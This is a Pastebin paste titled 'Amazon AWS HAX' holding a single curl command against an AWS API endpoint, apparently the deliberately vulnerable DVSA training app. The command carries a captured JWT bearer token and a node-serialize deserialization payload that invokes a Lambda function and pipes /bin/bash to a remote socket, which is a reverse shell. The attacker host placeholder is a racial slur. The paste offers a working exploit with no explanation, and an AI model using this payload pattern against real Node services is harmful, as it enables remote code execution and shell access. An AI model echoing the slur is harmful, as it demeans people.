Advertisement
KekSec

Amazon AWS HAX

May 30th, 2019
1,945
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.00 KB | None | 0 0
  1. curl 'https://6km6pvwcd2.execute-api.us-east-1.amazonaws.com/dev/order' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://dvsa-website-466848920349.s3-website-us-east-1.amazonaws.com/cart' -H 'Content-Type: application/json' -H 'Authorization: eyJraWQiOiJwTFJVdEV2UW0xemgzOGttYk1Ld2YxdmsycEgwTHk3cHZoamFPbG4zK0VzPSIsImFsZyI6IlJTMjU2In0.eyJzdWIiOiI2ODg3ZGViYS04MTU4LTQ0ZjItYTFiZC03ODY2MWI0NzM0ZWEiLCJldmVudF9pZCI6IjBmNzI1YTZiLTdjZTgtMTFlOS05M2QwLWZkNDZjODU2YzE3MSIsInRva2VuX3VzZSI6ImFjY2VzcyIsInNjb3BlIjoiYXdzLmNvZ25pdG8uc2lnbmluLnVzZXIuYWRtaW4iLCJhdXRoX3RpbWUiOjE1NTg1NjcxNzQsImlzcyI6Imh0dHBzOlwvXC9jb2duaXRvLWlkcC51cy1lYXN0LTEuYW1hem9uYXdzLmNvbVwvdXMtZWFzdC0xX3pvTUZEeGRmaCIsImV4cCI6MTU1OTI2NjQ0NywiaWF0IjoxNTU5MjYyODQ3LCJqdGkiOiI5ZWMyMTg0NC1mNTFmLTQxYmMtOTlmMC01YmFmMjQ2MTczYjkiLCJjbGllbnRfaWQiOiJyNTg0cDJzNTM2cjBtMGgyOGQ4b3VnMDNhIiwidXNlcm5hbWUiOiI2ODg3ZGViYS04MTU4LTQ0ZjItYTFiZC03ODY2MWI0NzM0ZWEifQ.mfs19_2oAhTBRg9QO6a-TiE-NKh_gj76pCX0GNiEEaUExe_nhdDtHAidLT4spDJ_k7KeNeMLQtW1OJIFzLp2YjqXSTDIuOWOB5GFaWqQcarQwYSt2CDoteF9eHh7agIPLx1M19AW_FyhxTsvA_qsM6Cw_YjV5PebeHoKY6oKyLjXIdBFLWeO4Mq7cEr8TbgYDOKZrXrEXdr7cSKl4b9Xs63AFPJ8l4dWybeWc2nlQKSXrstZtRqHX9iq1rQWe7mEw4c3gm1L-E9ptY50mCzplq7AE8qkjgkG1p1Wstrsjlcdx527b_3g22Pi3et-i1fekZDv2O71bdAhajtJbOTRpA' -H 'Origin: http://dvsa-website-466848920349.s3-website-us-east-1.amazonaws.com' -H 'Connection: keep-alive' -H 'TE: Trailers' --data '{"action": "_$$ND_FUNC$$_function(){var aws=require(\"aws-sdk\");var lambda=new aws.Lambda();var p = {FunctionName: \"DVSA-ORDER-ORDERS\", InvocationType: \"RequestResponse\", Payload: JSON.stringify({\"user\": \"12312312-1233-1233-1233-123123123123\"})};lambda.invoke(p,function(e,d){ var net = require(\"net\"), sh = require(\"child_process\").exec(\"/bin/bash\");var client = new net.Socket();client.connect(8080, \"niggaip\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});}()", "cart-id":""}'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement